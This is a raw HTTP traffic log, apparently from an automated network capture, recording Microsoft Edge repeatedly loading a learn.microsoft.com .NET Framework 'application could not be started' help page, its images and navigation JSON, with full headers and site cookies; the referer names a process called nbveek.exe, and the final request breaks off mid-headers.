etag: "8HbLinmfUCalpFY5kd8ehkcr/yCyF0uEfrGPXj82TLg="
cache-control: public, max-age=584
expires: Sat, 31 Dec 2022 00:15:36 GMT
date: Sat, 31 Dec 2022 00:05:52 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448747901
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
if-none-match: "0x8D8E3CB30F4C3E2"
if-modified-since: Wed, 10 Mar 2021 13:48:31 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:31 GMT
etag: "0x8D8E3CB30F4C3E2"
cache-control: public, max-age=1767
expires: Sat, 31 Dec 2022 00:35:20 GMT
date: Sat, 31 Dec 2022 00:05:53 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448747901
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
if-none-match: "0x8D8E3CB365AA10A"
if-modified-since: Wed, 10 Mar 2021 13:48:40 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:40 GMT
etag: "0x8D8E3CB365AA10A"
cache-control: public, max-age=1783
expires: Sat, 31 Dec 2022 00:35:36 GMT
date: Sat, 31 Dec 2022 00:05:53 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448747901
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
if-none-match: "0x8D8E3CB33C8B874"
if-modified-since: Wed, 10 Mar 2021 13:48:35 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:35 GMT
etag: "0x8D8E3CB33C8B874"
cache-control: public, max-age=1778
expires: Sat, 31 Dec 2022 00:35:31 GMT
date: Sat, 31 Dec 2022 00:05:53 GMT
akamai-cache-status: Hit from child
-
Remote address:104.73.152.149:443RequestGET /en-us/content-nav/MSDocsHeader-DotNet.json? HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448747901
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
if-none-match: "0x8DADC4C64D82904"
if-modified-since: Mon, 12 Dec 2022 14:23:09 GMT
ResponseHTTP/2.0 304
last-modified: Thu, 03 Nov 2022 17:50:35 GMT
etag: "0x8DABDC3E90AE3AD"
cache-control: public, max-age=585
expires: Sat, 31 Dec 2022 00:15:38 GMT
date: Sat, 31 Dec 2022 00:05:53 GMT
akamai-cache-status: Hit from child
-
Remote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/toc.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448747901
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
if-none-match: "0x8DABDC3E90AE3AD"
if-modified-since: Thu, 03 Nov 2022 17:50:35 GMT
ResponseHTTP/2.0 304
last-modified: Mon, 12 Dec 2022 14:23:09 GMT
etag: "0x8DADC4C64D82904"
cache-control: public, max-age=437
expires: Sat, 31 Dec 2022 00:13:10 GMT
date: Sat, 31 Dec 2022 00:05:53 GMT
akamai-cache-status: Hit from child
-
Remote address:104.73.152.149:443RequestGET /en-us/dotnet/breadcrumb/toc.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448747901
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
if-none-match: "0x8DAE48DCC103B02"
if-modified-since: Fri, 23 Dec 2022 02:31:29 GMT
ResponseHTTP/2.0 304
last-modified: Fri, 23 Dec 2022 02:31:29 GMT
etag: "0x8DAE48DCC103B02"
cache-control: public, max-age=545
expires: Sat, 31 Dec 2022 00:14:58 GMT
date: Sat, 31 Dec 2022 00:05:53 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448747901
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
if-none-match: "0x8D8E3CB3429357A"
if-modified-since: Wed, 10 Mar 2021 13:48:36 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:36 GMT
etag: "0x8D8E3CB3429357A"
cache-control: public, max-age=1736
expires: Sat, 31 Dec 2022 00:34:49 GMT
date: Sat, 31 Dec 2022 00:05:53 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/install-3-5.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448747901
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
if-none-match: "0x8D8E3CB2E2E71C7"
if-modified-since: Wed, 10 Mar 2021 13:48:26 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:26 GMT
etag: "0x8D8E3CB2E2E71C7"
cache-control: public, max-age=1783
expires: Sat, 31 Dec 2022 00:35:36 GMT
date: Sat, 31 Dec 2022 00:05:53 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0msedge.exeRemote address:104.73.152.149:443RequestGET /dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: original_req_url=https://learn.microsoft.com/dotnet/framework/install/application-not-started
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448752928
ResponseHTTP/2.0 301
request-context: appId=cid-v1:b1c5b6ea-7ff0-41d3-9862-84c5e1dc3be7
x-datacenter: wus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 05XyvYwAAAACKvLdpyfYJR4bfJ29s50+eQU1TMDRFREdFMTkxMQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 0
cache-control: no-cache, no-store
expires: Sat, 31 Dec 2022 00:05:57 GMT
date: Sat, 31 Dec 2022 00:05:57 GMT
set-cookie: original_req_url=https://learn.microsoft.com/dotnet/framework/install/application-not-started; expires=Sat, 31-Dec-2022 00:06:02 GMT; secure; HttpOnly; SameSite=Lax
akamai-cache-status: Miss from child, Miss from parent
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0msedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448752928
if-none-match: "8HbLinmfUCalpFY5kd8ehkcr/yCyF0uEfrGPXj82TLg="
ResponseHTTP/2.0 304
etag: "8HbLinmfUCalpFY5kd8ehkcr/yCyF0uEfrGPXj82TLg="
cache-control: public, max-age=579
expires: Sat, 31 Dec 2022 00:15:36 GMT
date: Sat, 31 Dec 2022 00:05:57 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448752928
if-none-match: "0x8D8E3CB30F4C3E2"
if-modified-since: Wed, 10 Mar 2021 13:48:31 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:31 GMT
etag: "0x8D8E3CB30F4C3E2"
cache-control: public, max-age=1763
expires: Sat, 31 Dec 2022 00:35:20 GMT
date: Sat, 31 Dec 2022 00:05:57 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448752928
if-none-match: "0x8D8E3CB365AA10A"
if-modified-since: Wed, 10 Mar 2021 13:48:40 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:40 GMT
etag: "0x8D8E3CB365AA10A"
cache-control: public, max-age=1779
expires: Sat, 31 Dec 2022 00:35:36 GMT
date: Sat, 31 Dec 2022 00:05:57 GMT
akamai-cache-status: Hit from child
-
Remote address:104.73.152.149:443RequestGET /en-us/content-nav/MSDocsHeader-DotNet.json? HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448752928
if-none-match: "0x8DADC4C64D82904"
if-modified-since: Mon, 12 Dec 2022 14:23:09 GMT
ResponseHTTP/2.0 304
last-modified: Mon, 12 Dec 2022 14:23:09 GMT
etag: "0x8DADC4C64D82904"
cache-control: public, max-age=433
expires: Sat, 31 Dec 2022 00:13:10 GMT
date: Sat, 31 Dec 2022 00:05:57 GMT
akamai-cache-status: Hit from child
-
Remote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/toc.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448752928
if-none-match: "0x8DABDC3E90AE3AD"
if-modified-since: Thu, 03 Nov 2022 17:50:35 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:26 GMT
etag: "0x8D8E3CB2E2E71C7"
cache-control: public, max-age=1779
expires: Sat, 31 Dec 2022 00:35:36 GMT
date: Sat, 31 Dec 2022 00:05:57 GMT
akamai-cache-status: Hit from child
-
Remote address:104.73.152.149:443RequestGET /en-us/dotnet/breadcrumb/toc.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
